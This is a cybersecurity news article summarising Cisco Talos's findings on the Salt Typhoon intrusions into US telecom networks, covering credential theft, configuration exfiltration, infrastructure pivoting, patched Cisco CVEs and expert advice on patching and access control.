Cisco Confirms Salt Typhoon Exploitation in Telecom Hits

Cisco Talos has been actively tracking reports of extensive intrusion attempts targeting multiple major U.S. telecommunications companies. First identified in late 2024 and subsequently confirmed by the US government, this activity is attributed to a highly advanced threat actor known as Salt Typhoon. According to public reports, Salt Typhoon successfully infiltrated core networking infrastructure in multiple instances, leveraging these systems to collect sensitive information. While one case suggested exploitation of a known Cisco vulnerability (CVE-2018-0171), Cisco Talos’ investigations indicate that most incidents stemmed from the use of legitimate victim login credentials rather than newly discovered vulnerabilities. The findings reveal that the threat actor maintained persistence in some environments for extended periods, with at least one instance of unauthorized access lasting over three years. Moreover, the attack campaign employed living-off-the-land (LOTL) techniques, allowing adversaries to exploit existing system tools to evade detection.

Purloined Credentials

Salt Typhoon relied on using stolen credentials to gain access. While the exact method of initial credential compromise is not apparent, the threat actor actively attempted to get its hands on additional credentials by extracting network device configurations and deciphering weakly encrypted local accounts. They were also observed capturing SNMP, TACACS, and RADIUS traffic, including secret keys, to enumerate credential details for further infiltration.

Configuration Exfiltration

In many instances, the threat actor exfiltrated device configurations using TFTP and FTP—configurations that often contained sensitive authentication material, such as SNMP Read/Write (R/W) community strings and weakly encrypted local account passwords. Malefactors could trivially decrypt these passwords offline and configurations provided insights into network infrastructure, enabling reconnaissance and lateral movement.

Infrastructure Pivoting

A hallmark of this campaign was the actor’s ability to pivot through compromised infrastructure. By using machine-to-machine connections, it maintained a presence within trusted infrastructure, slipping past network security measures. Salt Typhoon also used compromised devices from one telecom provider as hop points to target infrastructure at another provider. Some of these hop points were also used for outbound data exfiltration, exploiting network equipment from multiple manufacturers.

Configuration Modification

The actor also altered device running configurations and subsystems associated with Bash and Guest Shell, a Linux-based virtual environment on Cisco devices. The observed modifications included:

• AAA/TACACS+ server modifications (IP address changes)

• Loopback interface IP modifications

• GRE tunnel creation and use

• Unexpected local account creation

• ACL modifications

• SNMP community string modifications

• HTTP/HTTPS server modifications on standard and non-standard ports

• Shell access modifications (Guest Shell enable/disable, alternate SSH servers on high ports, Linux-level user creation, modification of /etc/shadow and /etc/passwd, and adding SSH authorized keys under root or other users)

Packet Capture Techniques

Various tools and techniques were used to capture packet data, including:

• Tcpdump – A command-line utility for packet capture at the OS level.

• Tpacap – A Cisco IOS XR utility capturing interface-specific traffic.

• Embedded Packet Capture (EPC) – A Cisco IOS feature enabling packet capture and export.

• JumbledPath – A custom-built tool enabling remote packet capture through jump hosts while obfuscating source and destination information.

No New Cisco Vulnerabilities Discovered

Despite reports suggesting that Salt Typhoon might have exploited other Cisco vulnerabilities, Cisco Talos says it has found no evidence confirming these claims. The vulnerabilities in question, which already have security fixes available, include:

• CVE-2018-0171 – Cisco IOS and IOS XE Software Smart Install Remote Code Execution Vulnerability

• CVE-2023-20198, CVE-2023-20273 – Multiple vulnerabilities in Cisco IOS XE Software Web UI Feature

• CVE-2024-20399 – Cisco NX-OS Software CLI Command Injection Vulnerability

Patch Before it’s Too Late

Cisco Talos stresses that patching these vulnerabilities is critical, as bad actors often use publicly available malicious tools to exploit unpatched systems. It advises all infrastructure defenders—not only those in the telecoms sector—to stick to best practices for securing network infrastructure. Darren Guccione, CEO and Co-Founder at Keeper Security, adds: “Effective cybersecurity isn’t just about sealing off the front door – it requires vigilance in closing known security gaps and limiting damage when defenses fail.” He advises telecom providers and other critical infrastructure to take a layered approach that includes zero trust, least-privilege access and Privileged Access Management (PAM). “PAM helps restrict lateral movement by securing and limiting access to critical systems, making it significantly harder for attackers to persist and minimizing the impact of a breach. By securing critical accounts and restricting lateral movement, organizations can make it significantly harder for adversaries to maintain control over time.”

A Wake-up Call for the Industry

Rom Carmel, Co-Founder and CEO at Apono, says this incident is another wake-up call for the industry: “Legacy security gaps are still being exploited, and traditional perimeter-based defenses are no longer enough. Time and again, we see everyone from criminal gangs to APTs using tried-and-true methods like stolen credentials and known vulnerabilities to gain footholds, escalate privileges, and access sensitive resources. As organizations expand their cloud footprint, their identity attack surface grows, offering hackers more opportunities to exploit security gaps.”